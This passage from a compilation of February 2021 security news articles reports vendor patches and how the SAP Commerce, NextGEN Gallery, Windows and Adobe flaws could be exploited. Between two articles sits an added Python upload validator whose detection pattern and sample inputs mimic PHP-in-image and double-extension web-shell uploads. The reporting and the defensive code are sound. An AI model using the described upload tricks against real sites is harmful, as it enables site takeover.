To address the bug, the unofficial patch no longer allows for “an HTML Attribute value (normally a string) to be an object.” With only 5 or 6 CPU instructions, the patch should fully prevent exploitation, ACROS Security says.

The first batch of patches is being delivered to Windows (32bit and 64bit) systems that run the January 2021 Patch Tuesday updates (Windows 7 + ESU, Windows 10, Server 2008 R2 + ESU, Server 2016, 2019) and to those last updated on January 2020 (namely Windows 7 and Server 2008 R2 without ESU).

A second batch of patches is set to arrive on systems that have the February 2021 set of official security updates installed.


Vulnerability in VMware vSphere Replication Can Facilitate Attacks on Enterprises
16.2.2021 
Vulnerebility  Securityweek

VMware last week informed customers about the availability of patches for a potentially serious vulnerability affecting its vSphere Replication product.

vSphere Replication, a VMware vSphere component, is a virtual machine replication engine designed for data protection and disaster recovery.

VMware has told customers that several versions of the product are affected by a high-severity (important) command injection vulnerability that can be exploited by a hacker with admin privileges to execute shell commands on the underlying system.

“Successful exploitation of this issue may allow authenticated admin user to perform a remote code execution,” VMware said in its advisory.

The security hole is tracked as CVE-2021-21976. Patches have been released for each of the affected versions of vSphere Replication.

Egor Dimitrenko, the Positive Technologies researcher who discovered the vulnerability, told SecurityWeek that an attacker could obtain the access required for exploitation through, for example, social engineering or by hoping that the targeted admin account is protected by a weak password. Once the account has been accessed, exploitation of the vulnerability is not difficult, the researcher said.

“When carrying out an attack on a company infrastructure, an attacker can detect the VMware vSphere Replication instance at the perimeter of its network and, as the used password is weak, for example, he can guess credentials to enter the administrator interface,” Dimitrenko explained. “After gaining authorized access, the attacker will be able to exploit this vulnerability and execute arbitrary commands on the server with maximum privileges.”

“Having obtained the possibility of the execution of arbitrary commands on the server with maximum privileges, the attacker will be able to start further progress to seize full control over the company's infrastructure,” he added.


TIM’s Red Team Research (RTR) discovered a critical zero-day vulnerability in IBM InfoSphere Information Server
13.2.2021 
Vulnerebility  Securityaffairs

Researchers at TIM’s Red Team Research discovered a zero-day vulnerability in IBM InfoSphere Information Server.
Today, TIM’s Red Team Research, led by Massimiliano Brolli, discovered a new critical vulnerability in IBM InfoSphere Information Server. The flaw has not been addressed by IBM, because product version 8.5.0.0 is End-of-Life.

IBM InfoSphere Information Server is a data management product.

According to the product description from the vendor page:

“IBM InfoSphere Information Server Enterprise Edition is an industry-leading, end-to-end data platform that provides a complete suite of capabilities. These capabilities include automated data discovery, policy-driven governance, self-service data preparation, data quality assessment and cleansing for data in flight and at rest, and advanced dynamic or batch data transformation and movement. It helps you deliver trusted business-ready data to your key business initiatives such as big data, data lakes, data warehouse modernization and master data management.”

The researchers identified a Deserialization of Untrusted Data (CWE-502) flaw, tracked as CVE-2020-27583, with a CVSS3 score of 9.8. The vulnerability allows unrestricted remote code execution with root privileges, without requiring any authentication.

The laboratory has identified, from public sources available on the corporate website, vulnerabilities on vendors such as Oracle, Nokia, Siemens, Schneider Electric, QNAP, Selesta, WOWZA, MultiUX and recently WordPress, helping to improve overall IT security.

The complete list of CVEs discovered by TIM researchers (formerly Telecom Italia S.p.A.) is available on the TIM Corporate website:

https://www.gruppotim.it/redteam
TIM is one of the main Italian telecommunications companies, and one of the few Italian industrial companies that has devoted such an important effort to the search for undocumented vulnerabilities.


SAP Commerce Critical Security Bug Allows RCE

11.2.2021  Vulnerebility  Threatpost

The critical SAP cybersecurity flaw could allow for the compromise of an application used by e-commerce businesses.

SAP is warning of a critical vulnerability in its SAP Commerce platform for e-commerce businesses. If exploited, the flaw could allow for remote code execution (RCE) that ultimately could compromise or disrupt the application.

SAP Commerce organizes data – such as product information – to be disseminated across multiple channels. This can give businesses a leg up in dealing with complex supply-chain management issues.

The vulnerability (CVE-2021-21477) affects SAP Commerce versions 1808, 1811, 1905, 2005 and 2011. It ranks 9.9 out of 10 on the CVSS scale – making it critical in severity.

“With regard to the assigned CVSS score of 9.9 and facing the potential impact on the application, it is strongly recommended to mitigate the vulnerability as soon as possible,” said Thomas Fritsch with Onapsis, in a Tuesday analysis.

What Are SAP Commerce Drools Rules?
The flaw allows certain users with “required privileges” to edit Drools rules. Drools is an engine that makes up the rules engine for SAP Commerce. The purpose of Drools is to define and execute a set of rules that can be used by businesses to manage complex decision-making scenarios.

The flaw specifically stems from a rule in Drools that contains a ruleContent attribute. This attribute provides scripting facilities. Jurisdiction over ruleContent is typically reserved for high-privileged users, such as administrators, said Fritsch.

However, “due to a misconfiguration of the default user permissions that are shipped with SAP Commerce, several lower-privileged users and user groups gain permissions to change the DroolsRule ruleContents and thus gain unintended access to these scripting facilities,” said Fritsch.

Remote Code Execution in SAP Commerce
This means that an attacker with that lower level of privilege can inject malicious code into the Drools rules scripts – leading to RCE and the compromise of the underlying host. And ultimately, this allows a cybercriminal to impair “the confidentiality, integrity and availability of the application,” said Fritsch.

A patch has been issued; however, Fritsch said, the fixes for the vulnerability only address the default permissions when initializing a new installation of SAP Commerce.

“For existing installations of SAP Commerce, additional manual remediation steps are required,” he said. “The good news is that for existing installations, these manual remediation steps can be used as a full workaround for SAP Commerce installations that cannot install the latest patch releases in a timely manner.”

Other Critical SAP Cybersecurity Releases
The vulnerability update was one of seven security notes released on Tuesday by SAP. The other six releases were updates to previously released Patch Tuesday security notes.

One of these ranked 10 on the CVSS scale and addressed security issues in the browser control for Google Chromium, which is delivered with the SAP business client. It affects SAP business client version 6.5. A specific CVE assignment for this flaw, and further details, were not available.

Another critical-severity flaw that was previously released and updated on Tuesday included multiple flaws (CVE-2021-21465) in SAP Business Warehouse, a data “warehousing” product based on the SAP NetWeaver ABAP platform, which collects and stores data.

“The BW Database Interface allows an attacker with low privileges to execute any crafted database queries, exposing the backend database,” according to the Mitre Corporation. “An attacker can include their own SQL commands which the database will execute without properly sanitizing the untrusted data leading to SQL injection vulnerability which can fully compromise the affected SAP system.”

Patch Tuesday Security Updates
The vulnerability fixes come during a busy Patch Tuesday week. Microsoft addressed nine critical-severity security bugs in its February Patch Tuesday updates, as well as an important-rated vulnerability that is being actively exploited in the wild.

Adobe warned of a critical vulnerability that has been exploited in the wild in “limited attacks” to target Adobe Acrobat Reader users on Windows.

And, Intel issued fixes for five high-severity vulnerabilities in its graphics drivers. Attackers can exploit these flaws to launch an array of malicious attacks – such as escalating their privileges, stealing sensitive data or launching denial-of-service attacks.


Intel Squashes High-Severity Graphics Driver Flaws

11.2.2021  Vulnerebility  Threatpost
Intel is warning on security bugs across its graphics drivers, server boards, compute modules and modems.

Intel has issued fixes for five high-severity vulnerabilities in its graphics drivers. Attackers can exploit these flaws to launch an array of malicious attacks – such as escalating their privileges, stealing sensitive data or launching denial-of-service attacks.

The graphics driver is software that controls how graphic components work with the rest of the computer. Intel develops graphics drivers for Windows OS to communicate with specific Intel graphics devices, for instance. The most serious of the flaws in Intel’s graphics drivers (CVE-2020-0544), which ranks 8.8 out of 10 on the CVSS scale, stems from the kernel mode driver, which is the piece of a graphics driver that executes any instruction it needs on the CPU without waiting, and can reference any memory address that is available.

This flaw stems from insufficient control-flow management in Intel graphics drivers prior to version 15.36.39.5145. The flaw can enable a user to escalate their privileges – however, an attacker would need to be authenticated and have local access to the device, said Intel.

Another privilege-escalation issue (CVE-2020-0521) stemming from insufficient control-flow management was fixed in Intel graphics drivers (also before version 15.45.32.5145). To exploit this flaw, an attacker would also need to be authenticated and have local access.

Intel also warned of a use-after-free bug (CVE-2020-12361), an improper conditions-check problem (CVE-2020-24450) and an integer-overflow vulnerability (CVE-2020-12362) in its graphics drivers. The latter could enable denial-of-service (DoS) attacks on affected devices.

Intel Server Boards and Compute Modules Flaws
Intel also patched two high-severity flaws in its server boards, server systems and compute modules. Specifically affected are the Intel Server System R1000WF and R2000WF families; Intel Server Board S2600WF family, Intel Server Board S2600ST family and Intel Server Board S2600BP family; and Intel Compute Module HNS2600BP family.

One of these flaws is a buffer-overflow issue (CVE-2020-12373) in the Baseboard Management Controller (BMC) firmware for some Intel server boards, server systems and compute modules. The second vulnerability is an insufficient input validation hole (CVE-2020-12377) in the BMC firmware. Both flaws exist before version 2.47 and could “allow an authenticated user to potentially enable escalation of privilege via local access.”

Other Intel Security Vulnerabilities
Intel also fixed a high-severity flaw in its XMM 7360 modem, which converts data from a digital format into a format for a transmission medium. It’s used for LTE 4G smartphones and tablets.

“Improper buffer restrictions in firmware for Intel 7360 Cell Modem before UDE version 9.4.370 may allow unauthenticated users to potentially enable denial-of-service via network access,” said Intel.

The other high-severity flaw exists in Intel’s SSD Toolbox. This toolbox allows Windows users to update the firmware and run diagnostic tests on an Intel solid-state drive (SSD). According to Intel, the vulnerability stems from incorrect default permissions in the installer of the Intel SSD Toolbox, and may enable a privileged user to potentially enable local privilege escalation.

The fixes end a dry spell in security updates for Intel, which hasn’t disclosed any patched vulnerabilities since November. At that time, Intel issued a colossal security update addressing flaws across a myriad of products – most notably, critical bugs that can be exploited by unauthenticated cybercriminals in order to gain escalated privileges.


SAP addresses a critical flaw in SAP Commerce Product
11.2.2021 
Vulnerebility  Securityaffairs

SAP released seven new security notes on February 2021 Security Patch Day, including a Hot News note for a critical issue affecting SAP Commerce.
SAP released seven new security notes on February 2021 Security Patch Day and updated six previously released notes.

The new security notes include a Hot News note that addresses a critical vulnerability, tracked as CVE-2021-21477, in SAP Commerce.

The CVE-2021-21477 is a remote code execution that impacts the Commerce product if the rule engine extension is installed. The critical flaw received a CVSS score of 9.9.

“SAP Commerce Cloud, versions – 1808,1811,1905,2005,2011, enables certain users with required privileges to edit drools rules, an authenticated attacker with this privilege will be able to inject malicious code in the drools rules which when executed leads to Remote Code Execution vulnerability enabling the attacker to compromise the underlying host enabling him to impair confidentiality, integrity and availability of the application.” reads the advisory for the flaw.

Experts from security firm Onapsis pointed out that the rule engine extension is a common part of SAP Commerce installs, so the patch is relevant to the majority of these installations.

The rule engine is based on the Drools engine and is used to define and execute a set of rules that can manage even extremely complex decision-making scenarios.

“Drools rules contain a ruleContent attribute that provides scripting facilities. Changing of ruleContent should normally be limited to highly privileged users, like admin and other members of admingroup.” reads the analysis published by Onapsis. “Due to a misconfiguration of the default user permissions that are shipped with Commerce, several lower-privileged users and user groups gain permissions to change DroolsRule ruleContents and thus gain unintended access to these scripting facilities. This enables unauthorized users to inject malicious code into these scripts resulting in a strong negative impact on the application’s confidentiality, integrity and availability.”

In order to address this issue, the software giant has changed the default permissions for new SAP Commerce installations; the company also provided manual remediation steps for existing installations.

The following other two Hot News notes released by the vendor are updates to previously released notes:

Update to security note released on April 2018 Patch Day:
Security updates for the browser control Google Chromium delivered with SAP Business Client -Product – SAP Business Client, Version – 6.5.
Update to security note released on January 2021 Patch Day:
[CVE-2021-21465] Multiple vulnerabilities in SAP Business Warehouse (Database Interface). Additional CVE – CVE-2021-21468
Product – SAP Business Warehouse, Versions – 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782
SAP released two high-severity security notes, one for missing authorization checks in NetWeaver AS ABAP and S4 HANA (SAP Landscape Transformation), and another for a denial of service (DoS) in SAP NetWeaver AS ABAP and ABAP Platform.

The remaining security notes address medium-severity vulnerabilities in NetWeaver Master Data Management 7.1, NetWeaver Process Integration, Business Objects Business Intelligence Platform, SAPUI5, Web Dynpro ABAP Applications, UI5 HTTP Handler, and HANA Database.


Critical Vulnerability Patched in SAP Commerce Product
11.2.2021 
Vulnerebility  Securityweek

SAP has released seven new security notes on February 2021 Security Patch Day, including a Hot News note that addresses a critical flaw in SAP Commerce. It also updated six previously released notes.

Tracked as CVE-2021-21477 and featuring a CVSS score of 9.9, the critical issue could be abused for remote code execution, SAP explains in its advisory. The vulnerability impacts SAP Commerce if the rule engine extension is installed.

Meant to define and execute rules to manage decision-making scenarios, the rule engine uses a ruleContent attribute offering scripting facilities. While making modifications to ruleContent should normally be allowed for highly privileged users only, a misconfiguration shipped with SAP Commerce resulted in lower-privileged users and user groups being allowed to change ruleContents.

“This enables unauthorized users to inject malicious code into these scripts resulting in a strong negative impact on the application’s confidentiality, integrity and availability,” researchers with Onapsis, a firm that specializes in securing Oracle and SAP applications, explain.

SAP has addressed the bug by changing the default permissions for new SAP Commerce installations, but additional manual remediation steps are needed for existing installations. These steps, Onapsis says, can be used as a full workaround, provided that the latest patches can’t be installed.

Two other Hot News notes that SAP included in this month’s Security Patch Day are updates to previously released notes: one deals with the Chromium browser in Business Client, and the other with vulnerabilities initially addressed in Business Warehouse in January 2021.

Next in line are two other updated security notes, one for missing authorization checks in NetWeaver AS ABAP and S4 HANA (released in December 2020), and another for a denial of service flaw in NetWeaver AS ABAP and ABAP Platform (released in January 2021). Both have a high severity rating.

The remaining security patches, either new or updated, address medium-severity vulnerabilities in NetWeaver Master Data Management 7.1, NetWeaver Process Integration, Business Objects Business Intelligence Platform, SAPUI5, Web Dynpro ABAP Applications, UI5 HTTP Handler, and HANA Database.


Intel Patches Tens of Vulnerabilities in Software, Hardware Products
11.2.2021 
Vulnerebility  Securityweek

Intel on Tuesday announced the release of updates that patch tens of vulnerabilities across many of the company’s software and hardware products.

The chipmaker’s Patch Tuesday updates for February 2021 were described in 19 advisories, including four that cover high-severity vulnerabilities.

The list of high-severity flaws includes a privilege escalation issue in the Intel Solid State Drive (SSD) Toolbox, and a denial-of-service (DoS) flaw in the XMM 7360 Cell Modem that can be exploited by an unauthenticated attacker who has network access.

In its graphics drivers, Intel patched nearly two dozen vulnerabilities, including five high-severity bugs that can be exploited by authenticated attackers — four of them allow privilege escalation and one can be exploited for DoS attacks.

Intel also informed customers about five vulnerabilities in Server Board, Server System and Compute Modules Baseboard Management Controller (BMC) products, including two high-severity privilege escalation issues.

Medium-severity vulnerabilities have been patched in RealSense Depth Camera Manager (DCM), Ethernet I210 Controller series network adapters, Trace Analyzer and Collector, SOC Driver Package for STK1A32SC, Ethernet E810 adapter drivers for Linux and Windows, 722 Ethernet controllers, Software Guard Extensions (SGX), Extreme Tuning Utility (XTU), Quartus Prime software, PROSet/Wireless WiFi and Killer drivers for Windows 10, Enhanced Privacy ID (EPID) SDK, Server Board Onboard Video driver for Windows, Collaboration Suite for WebRTC, and the Optane DC Persistent Memory installer for Windows.

These security holes can lead to privilege escalation, DoS attacks and information disclosure, but exploitation in many cases requires a privileged user and local access.

Software and firmware updates have been released by Intel to patch these vulnerabilities. Intel has replaced SSD Toolbox with the Memory and Storage (MAS) tool, so SSD Toolbox will not be updated to patch the high-severity privilege escalation flaw.

Many of the vulnerabilities disclosed this week were discovered by Intel employees.

Microsoft’s Patch Tuesday updates for February 2021 fix over 50 vulnerabilities, including an actively exploited Windows kernel flaw. Adobe has also addressed more than 50 security holes, including a Reader vulnerability that has been exploited in limited attacks against Windows users.


Vulnerabilities in NextGEN Gallery Plugin Exposed Many WordPress Sites to Takeover
11.2.2021 
Vulnerebility  Securityweek

Two severe vulnerabilities in the NextGEN Gallery WordPress plugin could have exposed more than 800,000 websites to complete takeover, WordPress security company Defiant reported on Monday.

Available for more than a decade, the plugin provides users with a broad range of gallery management capabilities, such as batch upload of photos, metadata import, thumbnail editing, photo and gallery management, and more.

In December 2020, security researchers with Defiant’s Wordfence team discovered two cross-site request forgery (CSRF) vulnerabilities in the popular plugin, the most severe of which could lead to remote code execution (RCE) and stored cross-site scripting (XSS).

“Exploitation of these vulnerabilities could lead to a site takeover, malicious redirects, spam injection, phishing, and much more,” the security researchers say.

Tracked as CVE-2020-35942, the first of these issues features a CVSS score of 9.6 and affects one of the plugin’s security functions, is_authorized_request.

Because NextGEN Gallery supports the upload of custom CSS files, the vulnerability allows an attacker to upload files containing arbitrary code under a double extension, such as .php.css, which certain server configurations will then execute remotely. Code execution was also possible on configurations not vulnerable to double extensions, because of a “Legacy Templates” feature.

An attacker able to execute code remotely on a vulnerable website would be able to essentially take over the site. A similar result can be achieved via XSS, if a logged-in administrator visits a malicious page (which would likely require social engineering tactics).

Tracked as CVE-2020-35943, the second vulnerability is considered high severity (CVSS score of 8.8) and resides in the validate_ajax_request security function that was implemented for various AJAX actions. A logic flaw in the function would result in requests being processed if a specific parameter was missing.

“This made it possible to trick an administrator into submitting a request crafted to upload an arbitrary image file. While the uploaded file had to be a valid image file, it is possible to hide a webshell or other executable PHP code within such an image file,” Wordfence explains.

By setting the image file as Legacy Template, an attacker could combine the flaw with the previously described vulnerability and abuse it for code execution. However, the attacker would have to convince an administrator to click on a link resulting in these requests being sent.

Wordfence reported these vulnerabilities to the plugin’s publisher, Imagely, on December 14, 2020, and a patched version of the plugin was published three days later. Site admins should make sure they are running NextGEN Gallery version 3.5.0 or later, to be protected.


Adobe fixes a buffer overflow issue in Reader which is exploited in the wild
10.2.2021 
Vulnerebility  Securityaffairs

Adobe released security patches for 50 flaws affecting six products, including a zero-day flaw in Reader that has been exploited in the wild.
Adobe has released security updates that address 50 vulnerabilities affecting its Adobe Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver products.

Adobe fixed 23 CVEs in Adobe Reader, 17 of which have been rated as Critical.

One of these flaws, tracked as CVE-2021-21017, is a heap-based buffer overflow issue that affects Adobe Reader. The flaw is known to be actively exploited in the wild to achieve remote code execution on the vulnerable computer.

The flaw was anonymously reported to Adobe; the IT giant was informed that the vulnerability has been “exploited in the wild in limited attacks targeting Reader users on Windows.”

Adobe also addressed 18 vulnerabilities in Magento, seven of which have been rated as Critical.

Only three of these issues can be exploited by unauthenticated attackers without admin privileges. The flaws include reflected and stored XSS bugs, and an IDOR issue that can allow an attacker to access restricted resources.

Successful exploitation of some of the above issues could potentially lead to arbitrary code execution at the level of the current process.

The software vendor also fixed two Out-Of-Bounds (OOB) write vulnerabilities in the Illustrator product that could lead to code execution. The IT giant patched an Out-Of-Bounds (OOB) write vulnerability in the patch for Animate and an Important info disclosure issue in Dreamweaver. The company also fixed five critical flaws in Photoshop that could allow code execution.

“Besides the previously mentioned CVE-2021-21017, none of the other bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release.” reported ZDI. “A total of 14 of these bugs came through the ZDI program.”


Critical flaws in NextGen Gallery WordPress plugin still impact over 500K installs
10.2.2021 
Vulnerebility  Securityaffairs

The development team behind the NextGen Gallery plugin has addressed two severe CSRF vulnerabilities that could have allowed site takeover.
The developers behind the NextGen Gallery plugin have fixed two critical Cross-site request forgery (CSRF) vulnerabilities whose exploitation could lead to a site takeover, malicious redirects, spam injection, phishing, and other malicious activities.

NextGEN Gallery is one of the most popular WordPress gallery plugins and has been available since 2007. The plugin receives over 1.5 million new downloads per year and makes it easy to create highly responsive photo galleries.

NextGen Gallery currently has over 800,000 active installs, which means that a flaw in this plugin could have a widespread impact.

The two CSRF vulnerabilities, tracked as CVE-2020-35942, were discovered by researchers at security firm Wordfence.

Both issues would result in Reflected Cross-Site Scripting (XSS) and remote code execution (RCE) because an uploaded file would be included and executed whenever the selected album type was viewed on the site.
“Thus, it was possible to set various album types to use a template with the absolute path of the file uploaded in the previous step, or perform a directory traversal attack using the relative path of the uploaded file, regardless of that file’s extension, through a CSRF attack.” reads the post published by Wordfence.

“This would result in Local File Inclusion (LFI) and Remote code Execution (RCE), as the uploaded file would then be included and executed whenever the selected album type was viewed on the site. Any JavaScript included in the uploaded file would also be executed, resulting in Cross-Site Scripting (XSS).”

The experts pointed out that upon achieving Remote Code Execution on a website, attackers could have taken over the sites running the vulnerable versions of the plugin.

An attacker could trigger the flaws with social engineering techniques by tricking WordPress admins into clicking specially crafted links or attachments to perform malicious actions.
“As a reminder, once an attacker achieves Remote Code Execution on a website, they have effectively taken over that site. XSS can likewise be used to take over a site if a logged-in administrator visits a page running a malicious injected script.” reads the post published by Wordfence.

“This attack would likely require some degree of social engineering, as an attacker would have to trick an administrator into clicking a link that submitted crafted requests to perform these actions.”
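Both NextGEN Gallery write-ups above describe the same two upload paths: a double extension such as .php.css that some servers hand to the PHP interpreter, and PHP code hidden inside an otherwise valid image that a template include later executes. The following fail-closed upload validator is an added example in Python, not code from the plugin, Imagely or Wordfence; the accepted extension list and the magic-byte table are constructed for the example.

```python
import re
from typing import Tuple

# Added example (not code from NextGEN Gallery, Imagely or Wordfence):
# a fail-closed validator for user-supplied uploads covering the two
# paths described in the articles. Lists and thresholds are constructed.

# What a "custom CSS" or gallery-image uploader should accept, nothing else.
ALLOWED_EXTENSIONS = {"css", "jpg", "jpeg", "png", "gif"}

# Leading bytes of the accepted image formats (constructed lookup table).
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Any PHP open tag anywhere in the body: "<?php", the "<?=" short echo
# form, or a bare "<?" followed by whitespace (short_open_tag).
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)

# Only plain ASCII base names: no spaces, no dots, no Unicode look-alikes.
SAFE_BASENAME = re.compile(r"^[a-z0-9_-]{1,64}$")


def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every failure is an explicit reject."""
    # Any path separator or NUL means the caller is trying to steer where
    # the file lands (the absolute-path / directory-traversal part of the
    # Wordfence report), so the name is rejected rather than sanitised.
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "path separators or NUL in name"

    # Exactly one dot: "shell.php.css" has two and is rejected outright,
    # regardless of whether this particular server would treat it as PHP.
    parts = filename.lower().split(".")
    if len(parts) != 2:
        return False, "name must be <base>.<ext> with exactly one extension"
    base, ext = parts
    if not SAFE_BASENAME.match(base):
        return False, "base name contains disallowed characters"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"

    # The content must match the claimed type, not just the name.
    if ext in IMAGE_MAGIC and not content.startswith(IMAGE_MAGIC[ext]):
        return False, f"content does not look like a .{ext} image"
    if ext == "css" and b"\x00" in content:
        return False, "binary data in a CSS file"

    # A valid image can still carry PHP that a template include would run,
    # so the body is scanned for open tags whatever the extension is.
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag found in upload body"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample uploads: a clean stylesheet, a double extension,
    # and a real JPEG header with a PHP tag appended after it.
    for name, body in [
        ("theme.css", b"body { color: red; }"),
        ("shell.php.css", b"<?php echo 1; ?>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0JFIF<?php echo 1; ?>"),
    ]:
        print(name, check_upload(name, body))
```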

Below is the vulnerability timeline:

December 14, 2020 – The Wordfence Threat Intelligence team finishes researching vulnerabilities in NextGen Gallery. We deploy firewall rules and reach out to Imagely.
December 15, 2020 – Imagely replies and we provide full disclosure.
December 16, 2020 – Imagely sends us a patched version of the plugin to review.
December 17, 2020 – A patched version of NextGen Gallery is made available to the public.
January 13, 2021 – Sites running the free version of Wordfence receive firewall rules.

Since the release of the latest version, NextGEN Gallery has had only just over 260K new downloads, which implies that over 500K active installs are still vulnerable.


Patch Tuesday: Microsoft Warns of Under-Attack Windows Kernel Flaw
10.2.2021 
Vulnerebility  Securityweek

Microsoft's scheduled monthly batch of security patches landed with a loud thud Tuesday with fixes for at least 56 security vulnerabilities in a range of operating system and software products.

At least one of the flaws (CVE-2021-1732) is being exploited in the wild in zero-day attacks. Microsoft did not provide any additional details on the in-the-wild attacks beyond a generic "exploitation detected" checkbox in the advisory.

The acknowledgement of this zero-day attack, reported to Microsoft by Chinese security vendor DBAPPSecurity Ltd., comes just days after reports of a separate -- and still unpatched -- Internet Explorer vulnerability being used by hackers linked to the North Korean government.

The zero-day patch headlines a mega-patch release by Microsoft with fixes for 56 documented CVEs in multiple Windows OS frameworks and components, the widely deployed Office Product line and the Skype for Business and Windows Defender utilities.

Microsoft rates 11 of the 56 vulnerabilities as "critical," its highest severity rating. A total of 43 patched flaws are classified as "important" while two are rated "moderate."

The Microsoft patch drop adds to the workloads for weary defenders struggling to keep pace with the volume and pace of security updates from major vendors.

Earlier Tuesday, Adobe shipped fixes for multiple dangerous security holes, including a bug in the Adobe Reader that is being exploited in "limited targeted attacks" against Windows OS users.

A few days ago, Sonicwall warned of zero-day attacks against some products in its portfolio while Apple and Google scrambled to provide band-aids for under-attack flaws in the iOS and Android operating systems.

To make matters worse, the communications and guidance from these big-name vendors have been poor. Adobe, for example, casually mentioned the in-the-wild PDF Reader attacks but did not provide any IOCs (indicators of compromise) or other attack artifacts to aid enterprise threat hunters.

Microsoft, too, has been scarce with information on flaws that are being actively exploited or publicly known. It is likely the information has been shared with the company's MAPP (Microsoft Active Protection Program) partners of security vendors but several CISOs tell SecurityWeek it's becoming more and more difficult to mount a response plan without proper technical documentation of live attacks.

In addition to the bug under active exploitation (no IOCs available), Microsoft mentioned that six separate vulnerabilities are publicly known and exploit code may be available but the company did not provide additional documentation.

For a round-up of the major vulnerabilities and issues to prioritize, we recommend this recap from ZDI (Zero Day Initiative). Some highlights:

CVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability

This local privilege escalation would allow a logged-on user to execute code of their choosing at higher privileges. Bugs of this nature are typically paired with another bug that allows code execution at the logged-on user level. For example, this could be paired with an Adobe Reader exploit. An attacker would entice a user to open a specially crafted PDF, which would result in code execution through the Reader bug then escalation through this bug. This is also a common tactic for malware.

CVE-2021-24078 - Windows DNS Server Remote Code Execution Vulnerability

This patch fixes a bug in the Windows DNS Server that could allow remote code execution on affected systems. Fortunately, if your system is not configured to be a DNS server, it is not impacted by this bug. However, for those systems that are configured as DNS servers, this bug allows code execution in a privileged service from a remote, unauthenticated attacker. This is potentially wormable, although only between DNS servers. Prioritize this update if you depend on Microsoft DNS servers.

CVE-2021-24074 - Windows TCP/IP Remote Code Execution Vulnerability

There are two TCP/IP bugs in this month’s release, but I chose to highlight this vulnerability over CVE-2021-24094 since this bug affects IPv4 while the other impacts IPv6. Both bugs could allow remote, unauthenticated code execution on affected systems. For CVE-2021-24074, the vulnerability resides in IPv4 source routing, which should be disabled by default. You can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.

CVE-2021-26701 - .NET Core and Visual Studio Remote Code Execution Vulnerability

This is the only Critical-rated bug to be listed as publicly known, and without more information from Microsoft, that’s about all we know about it. Based on the CVSS, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.


Adobe Patches Reader Vulnerability Exploited in the Wild
10.2.2021 
Vulnerebility  Securityweek

Adobe on Tuesday announced the availability of patches for 50 vulnerabilities across six of its products, including a zero-day vulnerability in Reader that has been exploited in the wild.

The exploited vulnerability is tracked as CVE-2021-21017 and it was reported to Adobe anonymously. The software giant said it received a report that the flaw has been “exploited in the wild in limited attacks targeting Adobe Reader users on Windows.”

Little information has been shared about the zero-day vulnerability, but Adobe says it’s a heap-based buffer overflow that allows arbitrary code execution.

The last time Adobe patched an actively exploited zero-day vulnerability in Reader was in 2018.

An additional 22 vulnerabilities have been patched in Acrobat and Reader, including 16 critical issues that can be exploited for code execution. The remaining flaws can lead to privilege escalation and information disclosure.

Updates for the Magento e-commerce platform fix 18 vulnerabilities, but only three of them can be exploited without authentication and without admin privileges, including reflected and stored XSS bugs, and an IDOR issue that can allow an attacker to access restricted resources. However, only the stored XSS has been classified as critical.

In Photoshop, Adobe patched five critical memory corruption issues that can lead to arbitrary code execution, and in Animate the company resolved one such vulnerability. Two critical code execution flaws were patched in Illustrator.

In Dreamweaver, the company fixed one information disclosure issue.

Adobe says it’s not aware of any attacks exploiting the vulnerabilities in Magento, Photoshop, Animate, Illustrator and Dreamweaver, and, based on the assigned priority ratings, it does not expect them to be targeted.


Critical Firefox Vulnerability Can Allow Code Execution If Chained With Other Bugs
10.2.2021  Vulnerebility  Securityweek

An update released last week by Mozilla for Firefox 85 patches a critical information disclosure vulnerability that can be chained with other security flaws to achieve arbitrary code execution.

In its advisory for the vulnerability — the bug currently does not have a CVE identifier — Mozilla described it as a “buffer overflow in depth pitch calculations for compressed textures.” The issue, reported by researchers Abraruddin Khan and Omair through Trend Micro’s Zero Day Initiative (ZDI), apparently only impacts Firefox running on Windows — other operating systems are not affected.

“In the Angle graphics library, depth pitch computations did not take into account the block size and simply multiplied the row pitch with the pixel height. This caused the load functions to use a very high depth pitch, reading past the end of the user-supplied buffer,” Mozilla said.

ZDI vulnerability researcher Hossein Lotfi told SecurityWeek that the vulnerability is an information disclosure bug that exists within the implementation of the compressedTexImage3D API method in WebGL2. Exploitation requires the attacker to convince the targeted user to visit a malicious web page or open a malicious file.

“The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer,” Lotfi explained. “An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.”

ZDI is not aware of any attacks exploiting this vulnerability and there does not appear to be public knowledge of the flaw. The company will release an advisory of its own once a CVE identifier has been assigned.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised users and administrators to review Mozilla’s advisory and take action as necessary. A patch is included in Firefox 85.0.1 and Firefox ESR 78.7.1.


Critical WordPress Plugin Flaw Allows Site Takeover

9.2.2021  Vulnerebility  Threatpost

A patch in the NextGen Gallery WordPress plugin fixes critical and high-severity cross-site request forgery flaws.

Researchers are urging WordPress websites that utilize the NextGen Gallery plugin to apply a patch addressing critical and high-severity flaws.

The NextGen Gallery plugin, which is installed on 800,000 WordPress websites, allows sites to upload photos in batch quantities, import metadata and edit image thumbnails. Researchers discovered two cross-site request forgery (CSRF) flaws – one critical and one high-severity – in the plugin.

A patch for the flaws was released in version 3.5.0 on Dec. 17. In the first public disclosure of details of the flaws, released Monday, researchers urged website owners who use the plugin to ensure they are updated.

“Exploitation of these vulnerabilities could lead to a site takeover, malicious redirects, spam injection, phishing and much more,” said Ram Gall with Wordfence, on Monday.

What is a Cross-Site Request Forgery Flaw?
